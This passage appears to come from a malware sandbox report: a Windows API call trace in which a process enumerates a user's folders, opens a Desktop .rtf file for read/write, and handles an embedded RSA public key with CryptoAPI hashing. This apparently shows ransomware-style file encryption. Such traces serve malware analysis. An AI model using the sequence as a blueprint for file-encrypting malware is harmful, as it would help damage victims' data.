(HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.640] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0195.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.641] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.641] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.642] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.642] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.643] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.643] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\") returned="LocalLow\\" [0195.643] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0195.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddee8 [0195.644] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\") returned="AppData\\" [0195.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0195.644] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0195.644] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.644] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.644] PathFindFileNameW (pszPath="") returned="" [0195.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.644] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\LocalLow\\*" (normalized: "c:\\users\\keecfmwgj\\appdata\\locallow\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0195.644] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796723b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.645] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0195.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0195.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0195.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0195.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0195.645] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796723b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x50fdc710, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x50fdc710, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0195.645] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0195.645] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0195.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccaf50 [0195.645] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0195.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0195.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0195.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0195.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccad98 | out: hHeap=0x620000) returned 1 [0195.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccad98 [0195.647] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0195.648] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0195.648] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\bQ6SJi8RO0rg0dP\\") returned="bQ6SJi8RO0rg0dP\\" [0195.648] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0195.648] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0195.648] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0195.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.648] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0195.648] PathFindFileNameW (pszPath="") returned="" [0195.648] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\bQ6SJi8RO0rg0dP\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\bq6sji8ro0rg0dp\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa166e050, ftCreationTime.dwHighDateTime=0x1d89827, ftLastAccessTime.dwLowDateTime=0x16e79b70, ftLastAccessTime.dwHighDateTime=0x1d899b4, ftLastWriteTime.dwLowDateTime=0x16e79b70, ftLastWriteTime.dwHighDateTime=0x1d899b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0195.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0195.649] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa166e050, ftCreationTime.dwHighDateTime=0x1d89827, ftLastAccessTime.dwLowDateTime=0x16e79b70, ftLastAccessTime.dwHighDateTime=0x1d899b4, ftLastWriteTime.dwLowDateTime=0x16e79b70, ftLastWriteTime.dwHighDateTime=0x1d899b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0195.649] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7648ce00, ftCreationTime.dwHighDateTime=0x1d899db, ftLastAccessTime.dwLowDateTime=0x8bd6ff80, ftLastAccessTime.dwHighDateTime=0x1d8a566, ftLastWriteTime.dwLowDateTime=0x8bd6ff80, ftLastWriteTime.dwHighDateTime=0x1d8a566, nFileSizeHigh=0x0, nFileSizeLow=0x132ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3YgFUJ.rtf", cAlternateFileName="")) returned 1 [0195.649] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\bQ6SJi8RO0rg0dP\\3YgFUJ.rtf") returned=".rtf" [0195.649] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\bQ6SJi8RO0rg0dP\\3YgFUJ.rtf" (normalized: "c:\\users\\keecfmwgj\\desktop\\bq6sji8ro0rg0dp\\3ygfuj.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0195.649] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=78573) returned 1 [0195.649] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0195.652] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x132c7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.652] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.654] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.654] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x132ed, lpOverlapped=0x0) returned 1 [0195.655] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0195.656] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.656] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.656] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0195.657] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0195.657] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.657] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0195.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0195.657] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0195.657] GetLastError () returned 0x0 [0195.657] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0195.657] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0195.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0195.657] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0195.657] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0195.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0195.658] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0195.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x132f0) returned 0x2ea79b0 [0195.658] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0195.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0195.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd95d8 [0195.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0195.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0195.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddee8 [0195.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ca8 [0195.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddea0 [0195.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cc0 [0195.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cf0 [0195.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d50 [0195.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d08 [0195.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0195.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0195.659] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0195.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea4a68 [0195.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cf0 | out: hHeap=0x620000) returned 1 [0195.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d08 | out: hHeap=0x620000) returned 1 [0195.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d50 | out: hHeap=0x620000) returned 1 [0195.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0195.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea4a68 | out: hHeap=0x620000) returned 1 [0195.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d50 [0195.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0195.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2d08 [0195.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0195.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2cf0 [0195.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0195.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0195.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0195.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0195.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0195.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0195.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0195.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0195.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d08 | out: hHeap=0x620000) returned 1 [0195.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2cf0 | out: hHeap=0x620000) returned 1 [0195.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2d50 | out: hHeap=0x620000) returned 1 [0195.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0195.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0195.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0195.662] GetCurrentThreadId () returned 0x66c [0195.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0195.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea0970 [0195.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9680 [0195.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0195.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0195.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.663] GetCurrentThreadId () returned 0x66c [0195.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0195.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0195.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0195.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0195.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0195.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0195.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2d50 [0195.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0195.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0195.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0195.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2cf0 [0195.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0195.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0195.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0195.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 